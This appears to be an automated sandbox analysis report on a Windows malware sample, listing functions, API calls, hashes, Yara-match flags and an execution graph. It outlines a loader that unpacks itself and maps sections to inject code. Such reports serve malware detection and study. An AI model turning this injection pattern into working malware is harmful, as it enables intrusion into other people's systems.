                                                              • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                              • Instruction ID: 74c52d792651154b35292d0624a265a8ac5351d2dd942f5d0c11e8719098d6e9
                                                              • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                              • Instruction Fuzzy Hash: 95525874E01229DFDB64CF58C984BA8BBB1BF09304F1580E9E94DAB351DB30AA85CF14
                                                              Function 0040C05D Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 442 40c05d-40c070 call 40bd58 444 40c075-40c079 442->444 445 40c082-40c089 444->445 446 40c0a6 445->446 447 40c08b-40c0a4 SetLastError GetConsoleAliasesA 445->447 446->446 447->445
                                                              APIs
                                                                • Part of subcall function 0040BD58: LocalReAlloc.KERNEL32(00000000,00000000,00000000), ref: 0040BDCF
                                                                • Part of subcall function 0040BD58: InterlockedExchange.KERNEL32(?,00000000), ref: 0040BDF4
                                                                • Part of subcall function 0040BD58: RtlDeleteCriticalSection.NTDLL(?), ref: 0040BE01
                                                                • Part of subcall function 0040BD58: InitAtomTable.KERNEL32(00000000), ref: 0040BE08
                                                                • Part of subcall function 0040BD58: WriteConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 0040BE49
                                                                • Part of subcall function 0040BD58: ReadFileScatter.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 0040BE6C
                                                                • Part of subcall function 0040BD58: GetModuleFileNameW.KERNEL32(00000000,?,00000000), ref: 0040BE7B
                                                                • Part of subcall function 0040BD58: RaiseException.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040BE85
                                                                • Part of subcall function 0040BD58: RtlInterlockedPopEntrySList.NTDLL(?), ref: 0040BE9E
                                                              • SetLastError.KERNEL32(00000000), ref: 0040C08D
                                                              • GetConsoleAliasesA.KERNEL32(?,00000000,00000000), ref: 0040C09E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1418323999.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_40b000_xvJv1BpknZ.jbxd
                                                              Similarity
                                                              • API ID: ConsoleFileInterlocked$AliasesAllocAtomCriticalDeleteEntryErrorExceptionExchangeInitLastListLocalModuleNameOutputRaiseReadScatterSectionTableWrite
                                                              • String ID:
                                                              • API String ID: 3667857532-0
                                                              • Opcode ID: 813279e8e1a916ba94d193bc13b76e1b1b23179be4f78b8007e5de97a599e5e9
                                                              • Instruction ID: 551ccde0dd0d48cf6378eaa7998fdb273407ad05de26a9eb5aeb0103264d0f07
                                                              • Opcode Fuzzy Hash: 813279e8e1a916ba94d193bc13b76e1b1b23179be4f78b8007e5de97a599e5e9
                                                              • Instruction Fuzzy Hash: 53F03970D00208EBDB10EFE4C989B5EB7B4BB04709F5041BAE245B7080D7785B09DB4E
                                                              Function 02110E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 449 2110e0f-2110e24 SetErrorMode * 2 450 2110e26 449->450 451 2110e2b-2110e2c 449->451 450->451
                                                              APIs
                                                              • SetErrorMode.KERNELBASE(00000400,?,?,02110223,?,?), ref: 02110E19
                                                              • SetErrorMode.KERNELBASE(00000000,?,?,02110223,?,?), ref: 02110E1E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1419284680.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2110000_xvJv1BpknZ.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorMode
                                                              • String ID:
                                                              • API String ID: 2340568224-0
                                                              • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                              • Instruction ID: f41980ae68ce685da741fb8abaf3e2b422b08bc76916466801f808e01ad358d5
                                                              • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                              • Instruction Fuzzy Hash: C9D0123154512877DB002A95DC09BCD7B1CDF09B66F108021FB0DD9080C770954046E5
                                                              Function 0040BA8B Relevance: 1.5, APIs: 1, Instructions: 11memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 452 40ba8b-40baa8 VirtualProtect
                                                              APIs
                                                              • VirtualProtect.KERNELBASE(00000040,?), ref: 0040BAA1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1418323999.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_40b000_xvJv1BpknZ.jbxd
                                                              Similarity
                                                              • API ID: ProtectVirtual
                                                              • String ID:
                                                              • API String ID: 544645111-0
                                                              • Opcode ID: 9579d4fa8f1d047216bb4bfead913b7c675069936074915a355b04aa12b1eb40
                                                              • Instruction ID: 6e287615d579c877e3115f6ed5ab9f71deb573325f5e4f3e3404165ff566ea09
                                                              • Opcode Fuzzy Hash: 9579d4fa8f1d047216bb4bfead913b7c675069936074915a355b04aa12b1eb40
                                                              • Instruction Fuzzy Hash: 9CC08C7B20410CFBDB21CB91FE05E5A3B6CF304344F000060F319A0075C672A9099B18
                                                              Function 00401A01 Relevance: 1.3, APIs: 1, Instructions: 90sleepCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 453 401a01-401a48 call 4012a9 Sleep call 401524 463 401a57-401aa7 call 4012a9 453->463 464 401a4a-401a52 call 401615 453->464 464->463
                                                              APIs
                                                              • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                                • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1418280296.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_xvJv1BpknZ.jbxd
                                                              Similarity
                                                              • API ID: CreateDuplicateObjectSectionSleep
                                                              • String ID:
                                                              • API String ID: 4152845823-0
                                                              • Opcode ID: a2a9be82b00004be15cf4a85e345d814439cc040836b0b3e383e57413077d33c
                                                              • Instruction ID: 81c5b6d8da752c85ef5c48e217346158da0f95f2e0f30d6723e854e1366495a5
                                                              • Opcode Fuzzy Hash: a2a9be82b00004be15cf4a85e345d814439cc040836b0b3e383e57413077d33c
                                                              • Instruction Fuzzy Hash: AE21383234E201EBDB009B90AD419BA3315AB85714F34467BF5137A1F2C63E99436F6B
                                                              Function 004019E3 Relevance: 1.3, APIs: 1, Instructions: 63sleepCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 478 4019e3-401a48 call 4012a9 Sleep call 401524 493 401a57-401aa7 call 4012a9 478->493 494 401a4a-401a52 call 401615 478->494 494->493
                                                              APIs
                                                              • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                                • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1418280296.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_xvJv1BpknZ.jbxd
                                                              Similarity
                                                              • API ID: CreateDuplicateObjectSectionSleep
                                                              • String ID:
                                                              • API String ID: 4152845823-0
                                                              • Opcode ID: a19bf6b6478727a7cf19fe344aa6eb98edbd1b9355ee0bc977b84921ba6b77a5
                                                              • Instruction ID: 3d34462ae554e6b9c52ec10bfc335e1d4eef14cf0cc07287d36856a9453ce069
                                                              • Opcode Fuzzy Hash: a19bf6b6478727a7cf19fe344aa6eb98edbd1b9355ee0bc977b84921ba6b77a5
                                                              • Instruction Fuzzy Hash: AA11E17274A205FBDB00AA949C41EBA3228AB45714F308577BA43780F1D57D8953BF6F
                                                              Function 004019EE Relevance: 1.3, APIs: 1, Instructions: 58sleepCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 508 4019ee-401a48 call 4012a9 Sleep call 401524 521 401a57-401aa7 call 4012a9 508->521 522 401a4a-401a52 call 401615 508->522 522->521
                                                              APIs
                                                              • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                                • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1418280296.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_xvJv1BpknZ.jbxd
                                                              Similarity
                                                              • API ID: CreateDuplicateObjectSectionSleep
                                                              • String ID:
                                                              • API String ID: 4152845823-0
                                                              • Opcode ID: c9c058988959fe6f1bebb02f4b63465d1859dbae07441d9c99848e32b1ac1650
                                                              • Instruction ID: fd11faa5c1113836d14621795cf3d83bd65fd701f71c993b701afff5049cc75c
                                                              • Opcode Fuzzy Hash: c9c058988959fe6f1bebb02f4b63465d1859dbae07441d9c99848e32b1ac1650
                                                              • Instruction Fuzzy Hash: 27018B3274A201EBDB009A949C42ABA3728AF45714F2045B7BA43B90F1C67D99536F2B
                                                              Function 004019FA Relevance: 1.3, APIs: 1, Instructions: 58sleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                                • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1418280296.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_xvJv1BpknZ.jbxd
                                                              Similarity
                                                              • API ID: CreateDuplicateObjectSectionSleep
                                                              • String ID:
                                                              • API String ID: 4152845823-0
                                                              • Opcode ID: e11e32dbe801df22405823e13fb522a3676c7564745947c388d06d8c8a7d4e2f
                                                              • Instruction ID: 6cc9081dd0b90bd572a9145dab600ca03ca16d67528742debddf3dc55f5ee8c1
                                                              • Opcode Fuzzy Hash: e11e32dbe801df22405823e13fb522a3676c7564745947c388d06d8c8a7d4e2f
                                                              • Instruction Fuzzy Hash: 1A01C03274A105EBDB009A949C41EBA3328AB44710F308577BA43790F1C57D8A537F6F
                                                              Function 00401A09 Relevance: 1.3, APIs: 1, Instructions: 49sleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                                • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1418280296.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_xvJv1BpknZ.jbxd
                                                              Similarity
                                                              • API ID: CreateDuplicateObjectSectionSleep
                                                              • String ID:
                                                              • API String ID: 4152845823-0
                                                              • Opcode ID: cf05c8cd51f06970e1e68389e54baa8339b7ac568fc1d90295f4adfe3ec01b5a
                                                              • Instruction ID: 82411e1791d3a8170d7b0096784b0d07359e834b960e05cc8d1eb1f577d4cd17
                                                              • Opcode Fuzzy Hash: cf05c8cd51f06970e1e68389e54baa8339b7ac568fc1d90295f4adfe3ec01b5a
                                                              • Instruction Fuzzy Hash: 90018F3274A205EBDB00AAD4AC42EAA33289F45714F244577FA43B90F1C57D8A536F6B
                                                              Function 00401A10 Relevance: 1.3, APIs: 1, Instructions: 48sleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                                • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1418280296.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_xvJv1BpknZ.jbxd
                                                              Similarity
                                                              • API ID: CreateDuplicateObjectSectionSleep
                                                              • String ID:
                                                              • API String ID: 4152845823-0
                                                              • Opcode ID: 1ce4031546dc902cc4609c7e7de6d107d1fd440efca43239d715d6f2af8bec59
                                                              • Instruction ID: 961536146c74ce18795349366bfe527767909b26be76020be6548142ac7a4a5b
                                                              • Opcode Fuzzy Hash: 1ce4031546dc902cc4609c7e7de6d107d1fd440efca43239d715d6f2af8bec59
                                                              • Instruction Fuzzy Hash: 47018472705209EBCB00ABD09C42EA933249B45314F644577FA12B90F2D67D89536B2B
                                                              Function 02155E09 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02155E5A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1419421544.0000000002153000.00000040.00000020.00020000.00000000.sdmp, Offset: 02153000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2153000_xvJv1BpknZ.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                              • Instruction ID: 7ce8627ea71e6037c410e4caf55e12c421fa56827acf0e37ba6184a0b01d66b6
                                                              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                              • Instruction Fuzzy Hash: E2112879A40208EFDB01DF98C985E99BBF5EF08350F1580A4F9589B362D371EA90DF80

                                                              Non-executed Functions

                                                              Function 0211092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1419284680.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2110000_xvJv1BpknZ.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .$GetProcAddress.$l
                                                              • API String ID: 0-2784972518
                                                              • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                              • Instruction ID: d486d75307bc883e2e3f020181736d47453b96a2fc3586c5d122d2491ae3b294
                                                              • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                              • Instruction Fuzzy Hash: DD316CB6900609DFDB10CF99C880AAEBBF5FF48324F15405AD845AB314D771EA85CFA4
                                                              Function 00403406 Relevance: .2, Instructions: 172COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1418280296.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_xvJv1BpknZ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f1a99dda5f8a0a810f6dfd7ffcb20fb9386bb656a9bd30d63d74ae46b6effcca
                                                              • Instruction ID: ffc06cf009157061af95b141fb464433709802256663bfffc962ffdf4a1f9ae4
                                                              • Opcode Fuzzy Hash: f1a99dda5f8a0a810f6dfd7ffcb20fb9386bb656a9bd30d63d74ae46b6effcca
                                                              • Instruction Fuzzy Hash: 5651D0715296859FD713CF308CC5A967FADEF17301B0845BBD581AB5A3D3385A07838A
                                                              Function 02155A27 Relevance: .1, Instructions: 61COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1419421544.0000000002153000.00000040.00000020.00020000.00000000.sdmp, Offset: 02153000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2153000_xvJv1BpknZ.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                              • Instruction ID: 99131a953ea556830a5f1eff826f8f2d26a80a4c167bf61a4bfadc8b94965395
                                                              • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                              • Instruction Fuzzy Hash: 4C118272380111EFDB44DF55DCC0EA673EAFB88224B598095ED14CB311E775E801C760
                                                              Function 02110D90 Relevance: .0, Instructions: 43COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1419284680.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2110000_xvJv1BpknZ.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                              • Instruction ID: 7475680157ac40bf35106480223050aa579ca0c61c8a9dcb87d03faee0e78f5d
                                                              • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                              • Instruction Fuzzy Hash: 8101F272F516008FDF21CF20C804BAA33E5EB8A206F1540B8DD0A97285E370A8818B80
                                                              Function 0040BC36 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 66COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • UnhandledExceptionFilter.KERNEL32(00000000), ref: 0040BC59
                                                              • SetDefaultCommConfigA.KERNEL32(004230F0,?,00000000), ref: 0040BCAB
                                                              • SetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040BCB5
                                                              • SleepEx.KERNEL32(00000000,00000000), ref: 0040BCBD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1418323999.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_40b000_xvJv1BpknZ.jbxd
                                                              Similarity
                                                              • API ID: CalendarCommConfigDefaultExceptionFilterInfoSleepUnhandled
                                                              • String ID: -$d
                                                              • API String ID: 1714755991-1961052230
                                                              • Opcode ID: 767ce9f6e4b45859f0c898ce4a81191f8eb161bd46e591fa79638400a5444451
                                                              • Instruction ID: 611937db618160795b45420ca4b56ae8592046bfbc2aad96a730228e8614ca7d
                                                              • Opcode Fuzzy Hash: 767ce9f6e4b45859f0c898ce4a81191f8eb161bd46e591fa79638400a5444451
                                                              • Instruction Fuzzy Hash: 75119071D01228ABCB21DFA9ED859DFBFB8EF55714F10003AF105B6291CB344546CB99
                                                              Function 0040BAA9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(01F6EC08), ref: 0040BB75
                                                              • GetProcAddress.KERNEL32(00000000,00427ED0), ref: 0040BBB2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1418323999.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_40b000_xvJv1BpknZ.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProc
                                                              • String ID:
                                                              • API String ID: 1646373207-3916222277
                                                              • Opcode ID: f2f97dbd91ceef343cfa434ec76e2481c584c5966074daf8de3eed7171195444
                                                              • Instruction ID: 18c5cc9d400b96faee746cab7009418996affa1f81997e9bff723ab5a3e11860
                                                              • Opcode Fuzzy Hash: f2f97dbd91ceef343cfa434ec76e2481c584c5966074daf8de3eed7171195444
                                                              • Instruction Fuzzy Hash: CD31A03A66C7C4D8F321C7A4BD09B213B599B11B04F4184AAD550CB2BAD7FB0985C37E

                                                              Execution Graph

                                                              Execution Coverage:8.4%
                                                              Dynamic/Decrypted Code Coverage:17.6%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:165
                                                              Total number of Limit Nodes:7
                                                              execution_graph 4103 402e20 4104 402dd5 4103->4104 4106 402e24 4103->4106 4105 4019e3 15 API calls 4107 403029 4105->4107 4106->4105 4106->4107 4108 401620 4109 401626 4108->4109 4110 4016c6 NtDuplicateObject 4109->4110 4119 4017e2 4109->4119 4111 4016e3 NtCreateSection 4110->4111 4110->4119 4112 401763 NtCreateSection 4111->4112 4113 401709 NtMapViewOfSection 4111->4113 4114 40178f 4112->4114 4112->4119 4113->4112 4115 40172c NtMapViewOfSection 4113->4115 4116 401799 NtMapViewOfSection 4114->4116 4114->4119 4115->4112 4117 40174a 4115->4117 4118 4017c0 NtMapViewOfSection 4116->4118 4116->4119 4117->4112 4118->4119 4084 40b407 4085 40b413 4084->4085 4086 40b491 FlushFileBuffers 4085->4086 4087 40b41b __commit 4085->4087 4086->4087 4088 40b49d GetLastError 4086->4088 4088->4087 4157 20c092b GetPEB 4158 20c0972 4157->4158 4144 40b4e8 CreateFileA 4183 40b38b 4184 40b397 4183->4184 4186 40b3ab 4184->4186 4187 40b314 4184->4187 4188 40b328 4187->4188 4189 40b344 __freebuf 4187->4189 4188->4186 4189->4188 4191 40b808 4189->4191 4192 40b814 4191->4192 4194 40b81c __close 4192->4194 4195 40b76c 4192->4195 4194->4188 4196 40b77c 4195->4196 4197 40b7d2 4196->4197 4198 40b7c8 GetLastError 4196->4198 4197->4194 4198->4197 4169 4019ee 4170 4019f8 4169->4170 4171 401a2b Sleep 4170->4171 4172 401524 7 API calls 4171->4172 4173 401a46 4172->4173 4174 401615 7 API calls 4173->4174 4175 401a57 4173->4175 4174->4175 3942 20c003c 3943 20c0049 3942->3943 3955 20c0e0f SetErrorMode SetErrorMode 3943->3955 3948 20c0265 3949 20c02ce VirtualProtect 3948->3949 3951 20c030b 3949->3951 3950 20c0439 VirtualFree 3954 20c04be LoadLibraryA 3950->3954 3951->3950 3953 20c08c7 3954->3953 3956 20c0223 3955->3956 3957 20c0d90 3956->3957 3958 20c0dad 3957->3958 3959 20c0dbb GetPEB 3958->3959 3960 20c0238 VirtualAlloc 3958->3960 3959->3960 3960->3948 4159 402f74 4161 402f7e 4159->4161 4160 403029 4161->4160 4162 4019e3 15 API calls 4161->4162 4162->4160 4167 40b534 GetLocaleInfoA 4168 40b562 4167->4168 3961 2205f39 3964 2205f4a 3961->3964 3965 2205f59 3964->3965 3968 22066ea 3965->3968 3969 2206705 3968->3969 3970 220670e CreateToolhelp32Snapshot 3969->3970 3971 220672a Module32First 3969->3971 3970->3969 3970->3971 3972 2205f49 3971->3972 3973 2206739 3971->3973 3975 22063a9 3973->3975 3976 22063d4 3975->3976 3977 22063e5 VirtualAlloc 3976->3977 3978 220641d 3976->3978 3977->3978 4145 40b0f9 4146 40b105 4145->4146 4147 40b13a _realloc 4146->4147 4149 40b10c 4146->4149 4150 40b29f 4146->4150 4147->4149 4151 40b285 4147->4151 4153 40b1c5 RtlAllocateHeap 4147->4153 4154 40b21a RtlReAllocateHeap 4147->4154 4156 40b268 4147->4156 4148 40b2a4 RtlReAllocateHeap 4148->4149 4148->4150 4150->4148 4150->4149 4150->4151 4150->4156 4151->4149 4152 40b2ff GetLastError 4151->4152 4152->4149 4153->4147 4154->4147 4155 40b272 GetLastError 4155->4149 4156->4149 4156->4155 3979 402f9c 3981 402f8f 3979->3981 3982 403029 3981->3982 3983 4019e3 3981->3983 3984 4019f3 3983->3984 3985 401a2b Sleep 3984->3985 3990 401524 3985->3990 3987 401a46 3989 401a57 3987->3989 4002 401615 3987->4002 3989->3982 3991 401533 3990->3991 3992 4016c6 NtDuplicateObject 3991->3992 4001 4015cd 3991->4001 3993 4016e3 NtCreateSection 3992->3993 3992->4001 3994 401763 NtCreateSection 3993->3994 3995 401709 NtMapViewOfSection 3993->3995 3996 40178f 3994->3996 3994->4001 3995->3994 3997 40172c NtMapViewOfSection 3995->3997 3998 401799 NtMapViewOfSection 3996->3998 3996->4001 3997->3994 3999 40174a 3997->3999 4000 4017c0 NtMapViewOfSection 3998->4000 3998->4001 3999->3994 4000->4001 4001->3987 4003 401626 4002->4003 4004 4016c6 NtDuplicateObject 4003->4004 4013 4017e2 4003->4013 4005 4016e3 NtCreateSection 4004->4005 4004->4013 4006 401763 NtCreateSection 4005->4006 4007 401709 NtMapViewOfSection 4005->4007 4008 40178f 4006->4008 4006->4013 4007->4006 4009 40172c NtMapViewOfSection 4007->4009 4010 401799 NtMapViewOfSection 4008->4010 4008->4013 4009->4006 4011 40174a 4009->4011 4012 4017c0 NtMapViewOfSection 4010->4012 4010->4013 4011->4006 4012->4013 4013->3989 4014 40c05d 4019 40bd58 4014->4019 4016 40c075 4017 40c0a6 4016->4017 4018 40c08b SetLastError GetConsoleAliasesA 4016->4018 4017->4017 4018->4016 4020 40bd71 4019->4020 4021 40bdcc LocalReAlloc 4020->4021 4022 40bdde 4020->4022 4021->4020 4023 40bdeb 8 API calls 4022->4023 4024 40bebd 4022->4024 4027 40beb3 4023->4027 4025 40bf75 4024->4025 4026 40becd 6 API calls 4024->4026 4041 40ba54 GetModuleHandleW GetProcAddress 4025->4041 4036 40bf1f 4026->4036 4027->4024 4034 40bfdc 4048 40bcec 4034->4048 4036->4025 4037 40bfe1 4038 40c025 EnumTimeFormatsW 4037->4038 4039 40c044 GetProcessHeaps 4037->4039 4040 40c04f 4037->4040 4038->4037 4039->4037 4040->4016 4042 40ba7a LoadLibraryA 4041->4042 4043 40baa9 4042->4043 4044 40bae8 4043->4044 4045 40baf4 GetModuleHandleW GetProcAddress 4044->4045 4046 40bbca 4044->4046 4045->4044 4047 40ba8b VirtualProtect 4046->4047 4047->4034 4055 40bbef 4048->4055 4051 40bd22 GetConsoleAliasesLengthA FreeEnvironmentStringsA GetShortPathNameW 4052 40bd43 4051->4052 4060 40bc36 4052->4060 4056 40bc01 SetConsoleTitleW 4055->4056 4057 40bc0c 4055->4057 4056->4057 4058 40bc20 BuildCommDCBW 4057->4058 4059 40bc2c 4057->4059 4058->4059 4059->4051 4059->4052 4061 40bc58 UnhandledExceptionFilter 4060->4061 4063 40bc5f 4060->4063 4061->4063 4062 40bcc8 4062->4037 4063->4062 4064 40bc9e SetDefaultCommConfigA SetCalendarInfoA SleepEx 4063->4064 4064->4063 4163 40b57d 4164 40b5bd ___convertcp 4163->4164 4166 40b647 4163->4166 4165 40b69b WideCharToMultiByte 4164->4165 4164->4166 4165->4166

                                                              Executed Functions

                                                              Function 00401524 Relevance: 10.7, APIs: 7, Instructions: 248COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
